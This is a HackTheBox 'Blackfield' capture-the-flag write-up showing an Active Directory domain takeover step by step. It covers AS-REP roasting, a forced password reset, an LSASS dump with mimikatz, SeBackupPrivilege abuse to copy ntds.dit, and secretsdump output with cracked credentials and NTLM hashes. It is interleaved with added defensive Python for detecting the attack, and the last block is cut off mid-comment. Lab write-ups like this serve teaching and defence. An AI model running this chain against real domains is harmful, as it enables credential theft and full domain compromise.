Hackthebox Blackfield writeup
Summary
- Anonymous login to the share profiles$
- Creating a text file with the directory names
- Generating a TGT for a valid user and saving it in a file
- Cracking the hash with John
- Logging in to rpcclient
- Changing the audit2020 password to what I want
- Enumerating the share forensic
- Got a zip file lsass.zip, unzipping it
- Got a memory dump file lsass.DMP
- Dumping the NTLM hash from the file using mimikatz
- Login as svc_backup
- Got user.txt
- The user svc_backup can back up files
- Using diskshadow to create a new volume with an alias of C:
- Copying the ntds.dit
- Saving the registry file SYSTEM
- Cracking the NTLM hash from the files using secretsdump.py
- Login as administrator
- Got root.txt
Pwned
$evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Recon
Nmap
# Nmap 7.93 scan initiated Thu Jan 23 13:46:39 2025 as: nmap -Pn -sC -sV -oN blackfield.nmap 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.016s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-23 19:46:52Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-01-23T19:46:57
|_  start_date: N/A
|_clock-skew: 6h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 23 13:47:33 2025 -- 1 IP address (1 host up) scanned in 53.72 seconds
The open ports (DNS, Kerberos, LDAP, SMB, RPC) tell us that this machine is running Active Directory.
enum4linux
$ enum4linux blackfield.local
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jan 23 16:15:45 2025

 =========================================( Target Information )=========================================

Target ........... blackfield.local
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
--snip--

 ==============================( Getting domain SID for blackfield.local )==============================

Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
Got the domain name BLACKFIELD from enum4linux
or use
$ nxc smb 10.10.10.192
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
Smbclient
I tried to log in anonymously, enumerated the available shares, and here is what I got.
$ impacket-smbclient 'BLACKFIELD.local/a:@10.10.10.192'
$ smbmap -H 10.10.10.192 -u null
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.192:445	Name: dc01.blackfield.local	Status: Authenticated
    Disk                                                  	Permissions	Comment
    ----                                                  	-----------	-------
    ADMIN$                                            	NO ACCESS	Remote Admin
    C$                                                	NO ACCESS	Default share
    forensic                                          	NO ACCESS	Forensic / Audit share.
    IPC$                                              	READ ONLY	Remote IPC
    NETLOGON                                          	NO ACCESS	Logon server share 
    profiles$                                         	READ ONLY	
    SYSVOL                                            	NO ACCESS	Logon server share 
Okay… so basically we have two shares of interest:
- forensic
- profiles$
I tried to log in to the forensic share
$ impacket-smbclient anonymous@@dc01.blackfield.local -dc-ip dc01.blackfield.local          
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
Type help for list of commands
# shares
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# 
But we are not allowed to enumerate this share… move on
┌──(puck㉿kali)-[~/htb/blackfield]
└─$ sudo mount -t cifs -o username=anonymous,domain=blackfield.local //10.10.10.192/profiles$ /mnt/profiles
Password for anonymous@//10.10.10.192/profiles$:
list users
┌──(puck㉿kali)-[/mnt/profiles]
└─$ ls
AAlleni     BSamkoses    ETurgano   KAmavisca   MHoerauf    RNemnich      TKauten
ABarteski   BZandonella  EWojtila   KAtolikian  MKermarrec  RPoretsky     TKnupke
ABekesz     CAcherman    FAlirezai  KBrokinn    MKillberg   RStuehringer  TLintlop
ABenzies    CAkbari      FBaldwind  KCockeril   MLapesh     RSzewczuga    TMusselli
ABiemiller  CAldhowaihi  FBroj      KColtart    MMakhsous   RVallandas    TOust
--snip--
or
smbclient -N \\\\10.10.10.192\\profiles$ -c ls | awk '{ print $1 }'
Let's check which of these are valid users
└─$ ./kerbrute_linux_amd64 userenum -d blackfield.local --dc 10.10.10.192 validusers.txt -t 100
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
Version: v1.0.3 (9dad6e1) - 01/24/25 - Ronnie Flathers @ropnop
2025/01/24 09:52:25 >  Using KDC(s):
2025/01/24 09:52:25 >  	10.10.10.192:88
2025/01/24 09:52:30 >  [+] VALID USERNAME:	 Administrator@blackfield.local
2025/01/24 09:52:30 >  [+] VALID USERNAME:	 guest@blackfield.local
2025/01/24 09:52:30 >  [+] VALID USERNAME:	 puck@blackfield.local
2025/01/24 09:52:30 >  [+] VALID USERNAME:	 audit2020@blackfield.local
2025/01/24 09:52:30 >  [+] VALID USERNAME:	 svc_backup@blackfield.local
2025/01/24 09:52:30 >  [+] VALID USERNAME:	 support@blackfield.local
Using GetNPUsers.py to get a TGT
Now that we have users for the machine, we can use GetNPUsers from Impacket to request a TGT for any valid user on the machine. I will generate the hash in john format so I can use John the Ripper to crack it.
$ impacket-GetNPUsers BLACKFIELD.LOCAL/ -usersfile validusers.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

$krb5asrep$support@BLACKFIELD.LOCAL:f22ffe8b7c0ef2412afab66aecca2f3a$207b3faccc9f46586d8e528205796d6d54a8f10125a615ce6c9377d83007a969428d0a66558660f0ce190af690fce8fa1f5c9888c9302e9d859f77ae09ccd3ba5132a65bac2d8126814161dfc629922792d63cc3dc0695d0e69052172b1a81d23b94596d5a016f56dc37d1a82179fecf7d71ea93e2d28d81c236f5fd636a39219717c70d939771a11f74b7af4b6f48a3be9640c3fe27d40f7a11d3952106d67890f737368ae13effa603d13982ef21f3a30b8d4fc96db20177576e159de1ce827b61daba794b4a8b7fd1162faebccd7e009789f64377695be5a65b2d1d3312f0e9c81db45ced9a868c6fc3ffdf4137f3297ab2f9
Time to crack it with john
$ john hashes.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 74.10% (ETA: 16:31:25) 0g/s 1759Kp/s 1759Kc/s 1759KC/s Sarahmai..Samisbuff
#00^BlackKnight  ($krb5asrep$support@BLACKFIELD.LOCAL)
1g 0:00:00:08 DONE (2025-01-23 16:31) 0.1223g/s 1754Kp/s 1754Kc/s 1754KC/s #1WIF3Y.."chito"
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
And we cracked it gently….
The creds are valid for SMB, not for WinRM
$ nxc smb 10.10.10.192 -u support -p '#00^BlackKnight'
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight
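The two steps above (kerbrute's username probing and the AS-REP roast of support) both leave traces on the DC as Kerberos event 4768. As an added defender-side example that is not part of the original writeup, the following Python picks them out of 4768 EventData and also checks which accounts are roastable via the DONT_REQ_PREAUTH bit of userAccountControl. The event dicts, IP addresses and UAC values are constructed samples; only the 4768 field names, status codes and flag values are real Windows/Kerberos constants.

```python
from collections import defaultdict

# userAccountControl bit that turns Kerberos pre-authentication off; an
# account with it set is what GetNPUsers finds (support on this box)
DONT_REQ_PREAUTH = 0x400000
PREAUTH_NONE = 0                    # 4768 PreAuthType: logon without pre-auth
ETYPE_RC4_HMAC = 0x17               # etype 23, the offline-crackable AS-REP flavour
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # 4768 Status for a user that does not exist


def _num(value):
    """4768 fields arrive as strings; failed requests carry '-' for unset fields."""
    if value in (None, "", "-"):
        return None
    return int(str(value), 0)       # accepts "0x17" as well as plain "2"


def roastable_accounts(users):
    """users: (sAMAccountName, userAccountControl) pairs, e.g. taken from an
    LDAP dump like the one the writeup makes. Returns the accounts whose UAC
    has DONT_REQ_PREAUTH set: each of them hands its AS-REP to any
    unauthenticated client, so the flag should be cleared."""
    return sorted(name for name, uac in users if uac & DONT_REQ_PREAUTH)


def asrep_roast_alerts(events):
    """A successful 4768 (Status 0x0) with PreAuthType 0 and RC4 etype means
    the DC just issued an AS-REP that can be cracked offline.
    Returns {IpAddress: [accounts]} for every source that got one."""
    hits = defaultdict(set)
    for ev in events:
        if (_num(ev["Status"]) == 0
                and _num(ev["PreAuthType"]) == PREAUTH_NONE
                and _num(ev["TicketEncryptionType"]) == ETYPE_RC4_HMAC):
            hits[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(names) for ip, names in hits.items()}


def userenum_sources(events, threshold=5):
    """kerbrute-style enumeration shows up as one source producing 4768
    failures with Status 0x6 for many distinct names in a short window.
    Returns {IpAddress: number of distinct unknown names} at or above threshold."""
    unknown = defaultdict(set)
    for ev in events:
        if _num(ev["Status"]) == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: len(n) for ip, n in unknown.items() if len(n) >= threshold}


def _ev(user, ip, status, preauth="-", etype="0xffffffff"):
    """Build one constructed 4768 EventData record (failure defaults)."""
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample 4768 records, not real DC01 logs: one operator IP probes
# names from the profiles$ listing, then roasts support; a workstation does a
# normal pre-authenticated AES logon and one typo.
SAMPLE_EVENTS = [
    _ev(n, "10.10.14.5", "0x6") for n in
    ("AAlleni", "ABarteski", "ABekesz", "ABenzies", "ABiemiller", "BSamkoses")
] + [
    _ev("support", "10.10.14.5", "0x0", preauth="0", etype="0x17"),
    _ev("svc_backup", "10.10.10.50", "0x0", preauth="2", etype="0x12"),
    _ev("adminstrator", "10.10.10.50", "0x6"),
]

# Constructed userAccountControl values: 0x200 NORMAL_ACCOUNT, 0x10000
# DONT_EXPIRE_PASSWORD, plus DONT_REQ_PREAUTH on support
SAMPLE_USERS = [("support", 0x410200), ("audit2020", 0x10200),
                ("svc_backup", 0x10200)]

if __name__ == "__main__":
    print("roastable accounts:", roastable_accounts(SAMPLE_USERS))
    print("AS-REP issued without pre-auth:", asrep_roast_alerts(SAMPLE_EVENTS))
    print("enumeration sources:", userenum_sources(SAMPLE_EVENTS))
```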
Bloodhound
$ bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 --zip
We find here

The user SUPPORT@BLACKFIELD.LOCAL has the capability to change the user AUDIT2020@BLACKFIELD.LOCAL’s password without knowing that user’s current password.
Check the domain’s password policies
$ nxc smb 10.10.10.192 -u 'support' -p '#00^BlackKnight' --pass-pol
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight
SMB         10.10.10.192    445    DC01             [+] Dumping password info for domain: BLACKFIELD
SMB         10.10.10.192    445    DC01             Minimum password length: 7
SMB         10.10.10.192    445    DC01             Password history length: 24
SMB         10.10.10.192    445    DC01             Maximum password age: 41 days 23 hours 53 minutes
SMB         10.10.10.192    445    DC01
SMB         10.10.10.192    445    DC01             Password Complexity Flags: 000001
SMB         10.10.10.192    445    DC01             Domain Refuse Password Change: 0
SMB         10.10.10.192    445    DC01             Domain Password Store Cleartext: 0
SMB         10.10.10.192    445    DC01             Domain Password Lockout Admins: 0
SMB         10.10.10.192    445    DC01             Domain Password No Clear Change: 0
SMB         10.10.10.192    445    DC01             Domain Password No Anon Change: 0
SMB         10.10.10.192    445    DC01             Domain Password Complex: 1
SMB         10.10.10.192    445    DC01
SMB         10.10.10.192    445    DC01             Minimum password age: 1 day 4 minutes
SMB         10.10.10.192    445    DC01             Reset Account Lockout Counter: 30 minutes
SMB         10.10.10.192    445    DC01             Locked Account Duration: 30 minutes
SMB         10.10.10.192    445    DC01             Account Lockout Threshold: None
SMB         10.10.10.192    445    DC01             Forced Log off Time: Not Set
Logging in to rpcclient
After enumerating here and there for where to use the credentials, I logged in to rpcclient
Enumerating users
└─$ rpcclient 10.10.10.192 -U support
Password for [WORKGROUP\support]:#00^BlackKnight
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
--snip--
user:[BLACKFIELD653097] rid:[0x583]
user:[BLACKFIELD438814] rid:[0x584]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
user:[puck] rid:[0x238d]
rpcclient $> 
Getting info about current user
rpcclient $> queryuser support
    User Name   :	support
    Full Name   :	
    Logon Time               :	Fri, 24 Jan 2025 00:35:40 CET
    Logoff Time              :	Thu, 01 Jan 1970 01:00:00 CET
    Kickoff Time             :	Thu, 01 Jan 1970 01:00:00 CET
    Password last set Time   :	Sun, 23 Feb 2020 18:53:24 CET
    Password can change Time :	Mon, 24 Feb 2020 18:53:24 CET
    Password must change Time:	Thu, 14 Sep 30828 04:48:05 CEST
    unknown_2[0..31]...
    user_rid :	0x450
    group_rid:	0x201
    acb_info :	0x00010210
    fields_present:	0x00ffffff
    logon_divs:	168
    bad_password_count:	0x00000000
    logon_count:	0x0000000d
    padding1[0..7]...
    logon_hrs[0..21]...
rpcclient $> 
enumprivs
rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege 		0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 		0:3 (0x0:0x3)
SeLockMemoryPrivilege 		0:4 (0x0:0x4)
--snip--
SeTimeZonePrivilege 		0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 		0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 		0:36 (0x0:0x24)
rpcclient $> 
These are some of the available privs that the current user has…. From the few privs above I concluded that the user can change the other user's password.
https://malicious.link/post/2017/reset-ad-user-password-with-linux/
I tried almost all the available users and succeeded in changing the password of the user audit2020…
rpcclient $> setuserinfo2 audit2020 23 'Secret123!'
or use net rpc to change audit2020’s password
$ net rpc password 'audit2020' 'Secret123!' -U BLACKFIELD.local/'support'%'#00^BlackKnight' -S "BLACKFIELD.local"
Check creds
$ nxc smb 10.10.10.192 -u audit2020 -p 'Secret123!'
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Secret123!
I checked LDAP and only found one interesting thing:
The password policy has a lockoutThreshold of 0, which means we can attempt an unlimited
number of passwords without locking the account out (although this is quite noisy).
$ ldapsearch -H ldap://10.10.10.192 -b "DC=BLACKFIELD,DC=local" -D 'support@blackfield.local' -w '#00^BlackKnight' > support_ldap_dump
And now I can log in with smbclient to enumerate the forensic share….
└─$ smbclient -U audit2020 //10.10.10.192/forensic 'Secret123!'       
Password for [WORKGROUP\audit2020]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 14:03:16 2020
  ..                                  D        0  Sun Feb 23 14:03:16 2020
  commands_output                     D        0  Sun Feb 23 19:14:37 2020
  memory_analysis                     D        0  Thu May 28 22:28:33 2020
  tools                               D        0  Sun Feb 23 14:39:08 2020
        5102079 blocks of size 4096. 1690605 blocks available
smb: \>
Well… the user audit2020 has permission to read the share
Got the file lsass.zip
LSASS is short for Local Security Authority Subsystem Service, and it stores credentials in memory on behalf of a user that has an active (or recently active) session. This allows the user to access network resources without re-typing their credentials for each service. LSASS may store credentials in multiple forms, including reversibly encrypted passwords, Kerberos tickets, NT hashes, LM hashes and DPAPI keys. Credentials are stored in LSASS for sessions that have been established since the last reboot and have not been closed.
see also : https://en.hackndo.com/remote-lsass-dump-passwords/
After some manual enumeration I got a .zip file called lsass.zip from the directory memory_analysis; it was hard to find this file among so many files
smb: \memory_analysis\> get lsass.zip
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (3359.9 KiloBytes/sec) (average 3359.9 KiloBytes/sec)
smb: \memory_analysis\>
Unzip the file
┌──(puck㉿kali)-[~/htb/blackfield]
└─$ unzip lsass.zip
Archive:  lsass.zip
  inflating: lsass.DMP
Well, a .DMP file is a memory dump file that is created when a program crashes or something goes wrong….
It can sometimes be useful to extract information from it; that's why mimikatz has a feature to pull useful information, like NTLM hashes, out of such a dump
I copied the .DMP file to my Windows machine and downloaded mimikatz on it
Disable the virus protection on Windows to download mimikatz
https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf
Load your mimikatz.exe
sekurlsa::minidump /users/0xPrashant/Desktop/lsass.DMP
sekurlsa::LogonPasswords
And done!! I got basically two users' hashes:
- svc_backup
- administrator
Or we use pypykatz
┌──(puck㉿kali)-[~/htb/blackfield]
└─$ pypykatz lsa minidump lsass.DMP > hashes.txt
INFO:pypykatz:Parsing file lsass.DMP
                                                                                                                                        
┌──(puck㉿kali)-[~/htb/blackfield]
└─$ cat hashes.txt| more 
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
    == MSV ==
        Username: svc_backup
        Domain: BLACKFIELD
        LM: NA
        NT: 9658d1d1dcd9250115e2205d9f48400d
        SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
        DPAPI: a03cd8e9d30171f3cfe8caad92fef621
    == WDIGEST [633ba]==
        username svc_backup
        domainname BLACKFIELD
        password None
        password (hex)
    == Kerberos ==
        Username: svc_backup
        Domain: BLACKFIELD.LOCAL
    == WDIGEST [633ba]==
                                                                                                                                        
┌──(puck㉿kali)-[~/htb/blackfield]
There is an administrator NTLM hash, but I don't think this will evil-winrm that easily
As expected it didn't work…. move on
Login as svc_backup
└─$ nxc winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
WINRM       10.10.10.192    5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM       10.10.10.192    5985   DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
I tried the second NTLM hash, that of the svc_backup user
$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> 
Privilege escalation to root
Root is simpler than I would have thought….
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
From the output, this is the interesting one, and it suits the username svc_backup….
SeBackupPrivilege             Back up files and directories  Enabled
The user svc_backup can back up data since it has SeBackupPrivilege
It took me some time to figure out what to do, but some Google searches saved my time….
Since it is an AD machine and I have permission to back up anything from the machine, I am going to back up the NTDS.dit file and the SYSTEM registry hive
The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
Here is a good explanation from a PDF file of how this is going to work!!
I need to use diskshadow to first make a shadow copy of the C: volume, give it an alias and expose it as a drive letter, so I can read everything from C:
Here I made a text file, basically a script that will execute commands in the diskshadow console
SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias 0xprashant
create
expose %0xprashant% z:
Uploading the script
*Evil-WinRM* PS C:\temp> upload /home/prashant/0xprashant.txt
Info: Uploading /home/prashant/0xprashant.txt to C:\temp\0xprashant.txt
Data: 124 bytes of 124 bytes copied
Info: Upload successful!
Executing the script
*Evil-WinRM* PS C:\temp> diskshadow /s 0xprashant.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/10/2020 3:34:37 PM

-> SET CONTEXT PERSISTENT NOWRITER
SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }
        CLIENTACCESSIBLE      Specify to create shadow copies usable by client versions of Windows.
        PERSISTENT            Specify that shadow copy is persist across program exit, reset or reboot.
        PERSISTENT NOWRITERS  Specify that shadow copy is persistent and all writers are excluded.
        VOLATILE              Specify that shadow copy will be deleted on exit or reset.
        VOLATILE NOWRITERS    Specify that shadow copy is volatile and all writers are excluded.
Example: SET CONTEXT CLIENTACCESSIBLE
I got an error like this….. If I look at the error, it is complaining about "-> SET CONTEXT PERSISTENT NOWRITER", but in my script it is NOWRITERS, not NOWRITER.
Then I figured out that the last character of each line is being dropped before the line is used
So I added an extra dummy character at the end of every line
➜ prashant cat 0xprashant.txt
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias 0xprashantp
createp
expose %0xprashant% z:p
like this……!!!!!!
Running again
*Evil-WinRM* PS C:\programdata> diskshadow /s puckiestyle.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  1/29/2025 9:38:06 AM
-> SET CONTEXT PERSISTENT NOWRITERS
-> add volume c: alias 0xprashant
-> create
Alias 0xprashant for shadow ID {9adb5c52-03c2-4ca2-982b-e87b321da66d} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {bd61294e-acda-471e-aeb6-d70f4fce991b} set as environment variable.
Querying all shadow copies with the shadow copy set ID {bd61294e-acda-471e-aeb6-d70f4fce991b}
    * Shadow copy ID = {9adb5c52-03c2-4ca2-982b-e87b321da66d}		%0xprashant%
        - Shadow copy set: {bd61294e-acda-471e-aeb6-d70f4fce991b}	%VSS_SHADOW_SET%
        - Original count of shadow copies = 1
        - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
        - Creation time: 1/29/2025 9:38:08 AM
        - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
        - Originating machine: DC01.BLACKFIELD.local
        - Service machine: DC01.BLACKFIELD.local
        - Not exposed
        - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
        - Attributes:  No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %0xprashant% z:
-> %0xprashant% = {9adb5c52-03c2-4ca2-982b-e87b321da66d}
The shadow copy was successfully exposed as z:\.
*Evil-WinRM* PS C:\programdata> 
This time it ran smoothly….
Now it's time to copy the NTDS.dit file. There is a tool on GitHub that will do this for me….
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
Upload the two DLL files to the machine and then simply import them
*Evil-WinRM* PS C:\programdata> upload SeBackupPrivilegeCmdLets.dll
                                        
Info: Uploading /home/puck/htb/blackfield/SeBackupPrivilegeCmdLets.dll to C:\programdata\SeBackupPrivilegeCmdLets.dll
                                        
Data: 16384 bytes of 16384 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> upload SeBackupPrivilegeUtils.dll
                                        
Info: Uploading /home/puck/htb/blackfield/SeBackupPrivilegeUtils.dll to C:\programdata\SeBackupPrivilegeUtils.dll
                                        
Data: 21844 bytes of 21844 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\programdata> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\programdata> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\programdata\ndts.dit
*Evil-WinRM* PS C:\programdata> ls
    Directory: C:\programdata
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-         2/1/2020  11:04 AM                Microsoft
d-----        3/19/2020  11:08 AM                Package Cache
d-----        1/29/2025   9:38 AM                regid.1991-06.com.microsoft
d-----        9/15/2018  12:19 AM                SoftwareDistribution
d-----        2/23/2020   6:32 AM                ssh
d-----         2/1/2020  10:57 AM                USOPrivate
d-----         2/1/2020  10:57 AM                USOShared
d-----        3/19/2020  11:09 AM                VMware
-a----        1/29/2025   9:34 AM             95 0xprashant.txt
-a----        1/29/2025   9:38 AM            634 2025-01-29_9-38-08_DC01.cab
-a----        1/29/2025   9:44 AM       18874368 ndts.dit
-a----        1/29/2025   9:37 AM             99 puckiestyle.txt
-a----        1/29/2025   9:43 AM          12288 SeBackupPrivilegeCmdLets.dll
-a----        1/29/2025   9:43 AM          16384 SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\programdata> 
And we got it….. now it's time for the SYSTEM file
*Evil-WinRM* PS C:\programdata> download system
Info: Downloading C:\programdata\system to system
Info: Download successful!
*Evil-WinRM* PS C:\programdata> download ndts.dit
Info: Downloading C:\programdata\ndts.dit to ndts.dit
Info: Download successful!
*Evil-WinRM* PS C:\programdata>
Dumping NTLM hashes from ntds.dit and SYSTEM
Now I have both files…. I can use secretsdump.py to dump the NTLM hashes from them
$ impacket-secretsdump -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:6c7ffdd2736cc96ef870d1b94760b5e6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
--snip--
And here we got the NTLM hash for the user administrator
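The chain just walked through (a Backup Operators member logging on over WinRM, a scripted diskshadow run, and a PowerShell copy of ntds.dit out of the shadow copy) leaves three distinct Windows events: 4672 (special privileges assigned at logon), 4688 (process creation) and 4104 (PowerShell script block). As an added defender-side example, not code from the writeup, the following Python correlates those events per account and raises a high-confidence finding only when the privilege grant is paired with a shadow-copy or ntds.dit step. The event dicts are constructed; 4104 has no SubjectUserName field of its own, so the sample assumes the record's user SID has already been resolved into that key, and EXPECTED_BACKUP_HOLDERS is a constructed allowlist.

```python
import ntpath
from collections import defaultdict

# Constructed allowlist of accounts that are expected to receive
# SeBackupPrivilege at logon. A "service" account sitting in Backup
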